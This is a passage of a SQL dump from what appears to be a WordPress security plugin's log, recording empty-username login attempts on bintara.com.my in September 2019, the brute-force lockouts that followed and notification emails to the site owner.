empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY4CnkXpgmG5P@iB8lB3wAAAJM\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"178.128.212.173\";s:11:\"REMOTE_PORT\";s:5:\"48724\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY4CnkXpgmG5P@iB8lB3wAAAJM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077264.7492\";s:12:\"REQUEST_TIME\";s:10:\"1569077264\";}}','notice','2019-09-21 14:47:49','2019-09-21 14:47:48',18159864,19649696,'https://bintara.com.my/2019/wp-login.php',1,0,'178.128.212.173'),(26381,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY4GnkXpgmG5P@iB8lB6gAAAJU\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"192.169.227.134\";s:11:\"REMOTE_PORT\";s:5:\"44058\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY4GnkXpgmG5P@iB8lB6gAAAJU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077277.0516\";s:12:\"REQUEST_TIME\";s:10:\"1569077277\";}}','notice','2019-09-21 14:47:58','2019-09-21 14:47:57',18165016,19653456,'https://bintara.com.my/wp/wp-login.php',1,0,'192.169.227.134'),(26382,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:47:57\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:47:57\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:47:57\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:47:57\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:47:58','2019-09-21 14:47:57',18249992,19653456,'https://bintara.com.my/wp/wp-login.php',1,0,'192.169.227.134'),(26383,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:47:58','2019-09-21 14:47:57',18457696,19653456,'https://bintara.com.my/wp/wp-login.php',1,0,'192.169.227.134'),(26384,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY4RViJ7D9Gn7wDPh8n6wAAAM0\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"132.148.244.116\";s:11:\"REMOTE_PORT\";s:5:\"49880\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY4RViJ7D9Gn7wDPh8n6wAAAM0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077317.5466\";s:12:\"REQUEST_TIME\";s:10:\"1569077317\";}}','notice','2019-09-21 14:48:39','2019-09-21 14:48:37',19133776,20621744,'https://bintara.com.my/test/wp-login.php',1,0,'132.148.244.116'),(26385,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:48:37\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:48:37\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:48:37\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:48:37\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:48:39','2019-09-21 14:48:37',19218496,20621744,'https://bintara.com.my/test/wp-login.php',1,0,'132.148.244.116'),(26386,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:48:39','2019-09-21 14:48:37',19426256,20621744,'https://bintara.com.my/test/wp-login.php',1,0,'132.148.244.116'),(26387,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY4XHkXpgmG5P@iB8lCUAAAAI0\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"139.59.73.82\";s:11:\"REMOTE_PORT\";s:5:\"40842\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY4XHkXpgmG5P@iB8lCUAAAAI0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077340.2492\";s:12:\"REQUEST_TIME\";s:10:\"1569077340\";}}','notice','2019-09-21 14:49:01','2019-09-21 14:49:00',19133008,20622304,'https://bintara.com.my/wordpress/wp-login.php',1,0,'139.59.73.82'),(26388,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:49:00\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:49:00\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:49:00\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:49:00\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:49:01','2019-09-21 14:49:00',19217800,20622304,'https://bintara.com.my/wordpress/wp-login.php',1,0,'139.59.73.82'),(26389,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:49:01','2019-09-21 14:49:00',19425456,20622304,'https://bintara.com.my/wordpress/wp-login.php',1,0,'139.59.73.82'),(26390,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY4mzDrcQxTmGrCWuaV7wAAAc0\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.92.254\";s:11:\"REMOTE_PORT\";s:5:\"33682\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY4mzDrcQxTmGrCWuaV7wAAAc0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569077403.4271\";s:12:\"REQUEST_TIME\";s:10:\"1569077403\";}}','notice','2019-09-21 14:50:04','2019-09-21 14:50:03',19132808,20621192,'https://bintara.com.my/wp/wp-login.php',1,0,'157.230.92.254'),(26391,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:50:03\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:50:03\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:50:03\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:50:03\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:50:04','2019-09-21 14:50:03',19217520,20621192,'https://bintara.com.my/wp/wp-login.php',1,0,'157.230.92.254'),(26392,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:50:04','2019-09-21 14:50:03',19425016,20621192,'https://bintara.com.my/wp/wp-login.php',1,0,'157.230.92.254'),(26393,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY4tXkXpgmG5P@iB8lClgAAAI4\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"167.99.168.27\";s:11:\"REMOTE_PORT\";s:5:\"53110\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY4tXkXpgmG5P@iB8lClgAAAI4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569077429.394\";s:12:\"REQUEST_TIME\";s:10:\"1569077429\";}}','notice','2019-09-21 14:50:31','2019-09-21 14:50:29',19134216,20623856,'https://bintara.com.my/blog/wp-login.php',1,0,'167.99.168.27'),(26394,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:50:29\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:50:29\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:50:29\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:50:29\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:50:31','2019-09-21 14:50:29',19219248,20623856,'https://bintara.com.my/blog/wp-login.php',1,0,'167.99.168.27'),(26395,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:50:31','2019-09-21 